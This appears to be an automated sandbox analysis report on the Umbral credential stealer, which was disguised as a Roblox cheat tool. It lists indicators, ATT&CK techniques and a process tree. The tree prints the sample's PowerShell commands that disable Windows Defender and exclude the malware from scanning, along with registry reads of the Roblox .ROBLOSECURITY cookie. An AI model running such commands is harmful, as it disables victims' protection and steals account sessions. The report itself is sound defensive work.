umbral | 81046d6d4e474115dd898d8e4718bc2ba144928461baa26e23f26d73d8e3f2f7

Resubmissions

07-08-2023 19:00

230807-xnsecaad4s 10

29-06-2023 17:04

230629-vljy3sec74 10

Analysis

max time kernel
134s
max time network
150s
platform
windows10-1703_x64
resource
win10-20230621-en
resource tags

arch:x64arch:x86image:win10-20230621-enlocale:en-usos:windows10-1703-x64system
submitted
29-06-2023 17:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RbxCheats.exe
Size

217KB
MD5

84fe5aaf9d71e59205c851af53d6a1c7
SHA1

1b93e136c567dce28cccd900a02b694d9f488d86
SHA256

81046d6d4e474115dd898d8e4718bc2ba144928461baa26e23f26d73d8e3f2f7
SHA512

db3bfcbccd1b6e22754fd40841f2b2f0d229852879ab1c10e214d8185e5c29f8a8d3e318182c80a2887cf77f7e59aa3e95088b2901eb96720afd9e4f7d775a2d
SSDEEP

3072:WlP/chtWkOIGSAvD6vdnsUSaNZZDOAuIXk0IIIIIIEIIIIIIIIIIIlTIIIIIIIII:OcyHIGadsUSsZDO7+8eNHpDS

Score

10^/10

umbral spyware stealer

Malware Config

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral1/memory/1036-120-0x000001ECDC560000-0x000001ECDC59C000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
216	wmic.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2920667096-3376612704-1562175574-1000_Classes\Local Settings	firefox.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
4328	powershell.exe
4328	powershell.exe
4328	powershell.exe
2096	powershell.exe
2096	powershell.exe
2096	powershell.exe
2160	powershell.exe
2160	powershell.exe
2160	powershell.exe
3252	powershell.exe
3252	powershell.exe
3252	powershell.exe
1492	powershell.exe
1492	powershell.exe
1492	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1036	RbxCheats.exe
Token: SeDebugPrivilege	4328	powershell.exe
Token: SeIncreaseQuotaPrivilege	4328	powershell.exe
Token: SeSecurityPrivilege	4328	powershell.exe
Token: SeTakeOwnershipPrivilege	4328	powershell.exe
Token: SeLoadDriverPrivilege	4328	powershell.exe
Token: SeSystemProfilePrivilege	4328	powershell.exe
Token: SeSystemtimePrivilege	4328	powershell.exe
Token: SeProfSingleProcessPrivilege	4328	powershell.exe
Token: SeIncBasePriorityPrivilege	4328	powershell.exe
Token: SeCreatePagefilePrivilege	4328	powershell.exe
Token: SeBackupPrivilege	4328	powershell.exe
Token: SeRestorePrivilege	4328	powershell.exe
Token: SeShutdownPrivilege	4328	powershell.exe
Token: SeDebugPrivilege	4328	powershell.exe
Token: SeSystemEnvironmentPrivilege	4328	powershell.exe
Token: SeRemoteShutdownPrivilege	4328	powershell.exe
Token: SeUndockPrivilege	4328	powershell.exe
Token: SeManageVolumePrivilege	4328	powershell.exe
Token: 33	4328	powershell.exe
Token: 34	4328	powershell.exe
Token: 35	4328	powershell.exe
Token: 36	4328	powershell.exe
Token: SeDebugPrivilege	2096	powershell.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	3252	powershell.exe
Token: SeIncreaseQuotaPrivilege	3960	wmic.exe
Token: SeSecurityPrivilege	3960	wmic.exe
Token: SeTakeOwnershipPrivilege	3960	wmic.exe
Token: SeLoadDriverPrivilege	3960	wmic.exe
Token: SeSystemProfilePrivilege	3960	wmic.exe
Token: SeSystemtimePrivilege	3960	wmic.exe
Token: SeProfSingleProcessPrivilege	3960	wmic.exe
Token: SeIncBasePriorityPrivilege	3960	wmic.exe
Token: SeCreatePagefilePrivilege	3960	wmic.exe
Token: SeBackupPrivilege	3960	wmic.exe
Token: SeRestorePrivilege	3960	wmic.exe
Token: SeShutdownPrivilege	3960	wmic.exe
Token: SeDebugPrivilege	3960	wmic.exe
Token: SeSystemEnvironmentPrivilege	3960	wmic.exe
Token: SeRemoteShutdownPrivilege	3960	wmic.exe
Token: SeUndockPrivilege	3960	wmic.exe
Token: SeManageVolumePrivilege	3960	wmic.exe
Token: 33	3960	wmic.exe
Token: 34	3960	wmic.exe
Token: 35	3960	wmic.exe
Token: 36	3960	wmic.exe
Token: SeIncreaseQuotaPrivilege	3960	wmic.exe
Token: SeSecurityPrivilege	3960	wmic.exe
Token: SeTakeOwnershipPrivilege	3960	wmic.exe
Token: SeLoadDriverPrivilege	3960	wmic.exe
Token: SeSystemProfilePrivilege	3960	wmic.exe
Token: SeSystemtimePrivilege	3960	wmic.exe
Token: SeProfSingleProcessPrivilege	3960	wmic.exe
Token: SeIncBasePriorityPrivilege	3960	wmic.exe
Token: SeCreatePagefilePrivilege	3960	wmic.exe
Token: SeBackupPrivilege	3960	wmic.exe
Token: SeRestorePrivilege	3960	wmic.exe
Token: SeShutdownPrivilege	3960	wmic.exe
Token: SeDebugPrivilege	3960	wmic.exe
Token: SeSystemEnvironmentPrivilege	3960	wmic.exe
Token: SeRemoteShutdownPrivilege	3960	wmic.exe
Token: SeUndockPrivilege	3960	wmic.exe
Token: SeManageVolumePrivilege	3960	wmic.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
3720	firefox.exe
3720	firefox.exe
3720	firefox.exe
3720	firefox.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3720	firefox.exe
3720	firefox.exe
3720	firefox.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3720	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1036 wrote to memory of 4328	1036	RbxCheats.exe	66
PID 1036 wrote to memory of 4328	1036	RbxCheats.exe	66
PID 1036 wrote to memory of 2096	1036	RbxCheats.exe	69
PID 1036 wrote to memory of 2096	1036	RbxCheats.exe	69
PID 1036 wrote to memory of 2160	1036	RbxCheats.exe	71
PID 1036 wrote to memory of 2160	1036	RbxCheats.exe	71
PID 1036 wrote to memory of 3252	1036	RbxCheats.exe	73
PID 1036 wrote to memory of 3252	1036	RbxCheats.exe	73
PID 1036 wrote to memory of 3960	1036	RbxCheats.exe	75
PID 1036 wrote to memory of 3960	1036	RbxCheats.exe	75
PID 1036 wrote to memory of 1136	1036	RbxCheats.exe	78
PID 1036 wrote to memory of 1136	1036	RbxCheats.exe	78
PID 1036 wrote to memory of 1232	1036	RbxCheats.exe	80
PID 1036 wrote to memory of 1232	1036	RbxCheats.exe	80
PID 1036 wrote to memory of 1492	1036	RbxCheats.exe	82
PID 1036 wrote to memory of 1492	1036	RbxCheats.exe	82
PID 1036 wrote to memory of 216	1036	RbxCheats.exe	84
PID 1036 wrote to memory of 216	1036	RbxCheats.exe	84
PID 2628 wrote to memory of 3720	2628	firefox.exe	88
PID 2628 wrote to memory of 3720	2628	firefox.exe	88
PID 2628 wrote to memory of 3720	2628	firefox.exe	88
PID 2628 wrote to memory of 3720	2628	firefox.exe	88
PID 2628 wrote to memory of 3720	2628	firefox.exe	88
PID 2628 wrote to memory of 3720	2628	firefox.exe	88
PID 2628 wrote to memory of 3720	2628	firefox.exe	88
PID 2628 wrote to memory of 3720	2628	firefox.exe	88
PID 2628 wrote to memory of 3720	2628	firefox.exe	88
PID 2628 wrote to memory of 3720	2628	firefox.exe	88
PID 2628 wrote to memory of 3720	2628	firefox.exe	88
PID 3720 wrote to memory of 4528	3720	firefox.exe	89
PID 3720 wrote to memory of 4528	3720	firefox.exe	89
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90
PID 3720 wrote to memory of 4120	3720	firefox.exe	90

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\RbxCheats.exe
"C:\Users\Admin\AppData\Local\Temp\RbxCheats.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RbxCheats.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4328
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2096
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3252
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3960
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:1136
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:1232
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1492
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:216

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2628
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3720
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3720.0.953745898\314853354" -parentBuildID 20221007134813 -prefsHandle 1624 -prefMapHandle 1612 -prefsLen 20888 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {af2c88ba-2cf4-4ce3-8037-1738cc3007f5} 3720 "\\.\pipe\gecko-crash-server-pipe.3720" 1716 1edfe3a6b58 gpu
    3⤵
    PID:4528
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3720.1.1486445372\900881217" -parentBuildID 20221007134813 -prefsHandle 2040 -prefMapHandle 2036 -prefsLen 20969 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f61e8225-4a0d-4437-9bba-ef1bdcafd487} 3720 "\\.\pipe\gecko-crash-server-pipe.3720" 2072 1edfd012858 socket
    3⤵
    PID:4120
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3720.2.1126437170\1493158853" -childID 1 -isForBrowser -prefsHandle 2884 -prefMapHandle 2812 -prefsLen 21052 -prefMapSize 232675 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0ba8411-5143-4615-b122-bbfadc6cf9d4} 3720 "\\.\pipe\gecko-crash-server-pipe.3720" 2720 1ed82342258 tab
    3⤵
    PID:4872
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3720.3.1558828565\251732205" -childID 2 -isForBrowser -prefsHandle 3212 -prefMapHandle 3116 -prefsLen 26562 -prefMapSize 232675 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {12e371f0-a120-4f2c-b27c-ebf1982bd2d7} 3720 "\\.\pipe\gecko-crash-server-pipe.3720" 3288 1ed83394b58 tab
    3⤵
    PID:3108
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3720.4.1678779126\2138674529" -childID 3 -isForBrowser -prefsHandle 3408 -prefMapHandle 1308 -prefsLen 26562 -prefMapSize 232675 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {753aff8b-9365-46bf-b347-7f50b0ef31a0} 3720 "\\.\pipe\gecko-crash-server-pipe.3720" 3752 1ed81104b58 tab
    3⤵
    PID:3084
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3720.5.1525042811\1994360948" -childID 4 -isForBrowser -prefsHandle 4012 -prefMapHandle 4856 -prefsLen 26781 -prefMapSize 232675 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8dfca2ad-1fee-47f5-bcfa-35a154a88390} 3720 "\\.\pipe\gecko-crash-server-pipe.3720" 2456 1ed848d5158 tab
    3⤵
    PID:1836
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3720.6.883997301\346427836" -childID 5 -isForBrowser -prefsHandle 5104 -prefMapHandle 5100 -prefsLen 26781 -prefMapSize 232675 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4c4c7af6-09c5-437e-8c32-76cfa263cb36} 3720 "\\.\pipe\gecko-crash-server-pipe.3720" 5112 1ed8642c458 tab
    3⤵
    PID:168
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3720.7.62337941\46393107" -childID 6 -isForBrowser -prefsHandle 5216 -prefMapHandle 5220 -prefsLen 26781 -prefMapSize 232675 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8cd32667-1eb4-47ac-ab7d-fe4a84ebe0bf} 3720 "\\.\pipe\gecko-crash-server-pipe.3720" 5208 1ed8642e258 tab
    3⤵
    PID:2236

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3916301e615e444711436af2b395eeed

SHA1
fcff724b78eb5d3ba653f8d4a16f092fdc8cbb24

SHA256
6b72181727ba8ecca5f695035199d5a761dbde80b01dd9523cd67120af747541

SHA512
8e03db0a08145ed8773402b2488f50619d0768a5abc83ef01593a78bec34ab2c4f1e42d89052b4048ef410ce2eaa1f28e45ce0052b5cd9af7464d66f3fe31bde

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fbaaa2f804fcc34b7d6d87f6a11725e8

SHA1
15128d4ae942c82df2cc00e633814f8cab2dbece

SHA256
2f8c22b9ab5a503c15d187de825b7b7855392a5f0080b7c59b82e4398e8fe68b

SHA512
eb990093ed4bc60f1011d6480680eb8b02be988addab9d34d0ef694d0f59715e9aee019412c3e8f53f16a124288db9019b8c2bd62ff7d259cbc4dfb39b5b3c9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e2cbf5d2e008238a51b610a760b69221

SHA1
b6a58268eca36f9c9e72f7908ebc9a64019c13d4

SHA256
2d6f30e592e8143c53bbc1411488945604e2d4dd0a28b64b19b38f30f146ec64

SHA512
0a533f2f461b10ac95bcd553e8e9924e9bf89e7e99655153706bf3f87cb0a0bd61d415fafe0626baa42956c96f62b36efc8bb66f62d93aa84b5b52e60eba210e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
819d0d8d0447a5ae71c4fd99d2362c44

SHA1
2f0bbf635fa37c9bbae1b8980914982393d69179

SHA256
86ec9e54d2e6207b8b6fb89f0c566bd197c4631343fadd245a6ad7c9c917f975

SHA512
6f3672f286fc4d10d3f984c19934a5bb0f4d9a01503f8c3fe712f203a815c01fd91c9bec31c3db51223e1beda89d7adba815b690d90939413373c912b64c44a2

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\tsy7k28m.default-release\activity-stream.discovery_stream.json.tmp

Filesize
159KB

MD5
d5ce6f1ac86c718239a5fc3179aed75e

SHA1
30aa858de4ad9908d6f7453cee9f85d60c70bf47

SHA256
858ce8d2282905c4747cf4f6b9f252edbf3600a12cce539b45879e11e67b20a2

SHA512
a008fe9d13659166505a52dfd96a6dc8442b7f4848fde9e176de83c9bb955920c6cc81a5b653623a3a7fdb4448104cdc692bf93925196b830cc79adeb85ab9b1

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\tsy7k28m.default-release\cache2\entries\118BB2BA245AAA64B01692DF29396B97E11FC1A0

Filesize
14KB

MD5
3df8cee7a2a3f7c1e02cbc7bfa0e01de

SHA1
ec070676270c4df726286776b7817a89a54ca2a9

SHA256
e5634657a2cad22863d44225a5b77722743239390526e9ab58ac170b0f9409ce

SHA512
d680149670ebd82eafd74e93da5cab771f619fc470fa23e0dcf19b73fcb789fffa1ae70a3dd7935e7a24abaed2c5de83cfc10224245dc77d4757477c05ca7d27

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4pl1fgml.1lt.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
442KB

MD5
85430baed3398695717b0263807cf97c

SHA1
fffbee923cea216f50fce5d54219a188a5100f41

SHA256
a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

SHA512
06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
8.0MB

MD5
a01c5ecd6108350ae23d2cddf0e77c17

SHA1
c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

SHA256
345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

SHA512
b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tsy7k28m.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

Filesize
997KB

MD5
fe3355639648c417e8307c6d051e3e37

SHA1
f54602d4b4778da21bc97c7238fc66aa68c8ee34

SHA256
1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

SHA512
8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tsy7k28m.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

Filesize
116B

MD5
3d33cdc0b3d281e67dd52e14435dd04f

SHA1
4db88689282fd4f9e9e6ab95fcbb23df6e6485db

SHA256
f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

SHA512
a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tsy7k28m.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

Filesize
479B

MD5
49ddb419d96dceb9069018535fb2e2fc

SHA1
62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

SHA256
2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

SHA512
48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tsy7k28m.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

Filesize
372B

MD5
8be33af717bb1b67fbd61c3f4b807e9e

SHA1
7cf17656d174d951957ff36810e874a134dd49e0

SHA256
e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

SHA512
6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tsy7k28m.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

Filesize
11.8MB

MD5
33bf7b0439480effb9fb212efce87b13

SHA1
cee50f2745edc6dc291887b6075ca64d716f495a

SHA256
8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

SHA512
d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tsy7k28m.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

Filesize
1KB

MD5
688bed3676d2104e7f17ae1cd2c59404

SHA1
952b2cdf783ac72fcb98338723e9afd38d47ad8e

SHA256
33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

SHA512
7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tsy7k28m.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

Filesize
1KB

MD5
937326fead5fd401f6cca9118bd9ade9

SHA1
4526a57d4ae14ed29b37632c72aef3c408189d91

SHA256
68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

SHA512
b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tsy7k28m.default-release\prefs-1.js

Filesize
7KB

MD5
739753f3e5dc7015092d0d551717b8c4

SHA1
51b5660aba5f7313299690da0be641de8331f22e

SHA256
c80858de6b9be71d0d4264ec862cbe92307de6d48c8959a2f28955e6428389f4

SHA512
e41ebea23cfd6b9124efd228aa75c950108713943a6736aac1efa791a53d4983972aa6f3f4b4fcaad67ceb985f37bf3cdb3e923aa2577aed3ad1bad0982574f1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tsy7k28m.default-release\prefs-1.js

Filesize
6KB

MD5
be18b1dd389a3ca281e703ecb3a29279

SHA1
0d977446a2fea10fe77bfaa67ee16efa31e5c10a

SHA256
a836574a6170e403b569108a00eba893921ac1bc55ba343ac78fba908e35cf74

SHA512
bca49ad4846e2dcb02bcf77b94852f2580a7f5dd789c6d6cc0fd08a67f12433b370a769ee72197441db291f790c30072f9ab3f81072dc61816ee3c6f56239e86

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tsy7k28m.default-release\prefs-1.js

Filesize
6KB

MD5
5bc869ade09d1487bd247691cb97658e

SHA1
b4e8eb85ec03f0b4b1f7e2079a967783200d2015

SHA256
f185d95544a2932a4441ce9ad35ad5cd2571c85deea505e3e886c07e4e5c461d

SHA512
3f1d74c48773974826172bd2bbd7fe495e35551b93be1a2081a404e7d2b56a986c1fcd96de6f432c52104d92d0da190b0eb70967c6755525b7366e8a1942628e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tsy7k28m.default-release\prefs.js

Filesize
6KB

MD5
ccd576fbf1e594d415ab31c918f1b115

SHA1
2a5057ebcd4cad7b939f38f98ed2fa5c3f2c3bc6

SHA256
e0c3b419011fc70eaa0a0deaceaba6f4722a0e6eeb01538211d7b66cd1f10012

SHA512
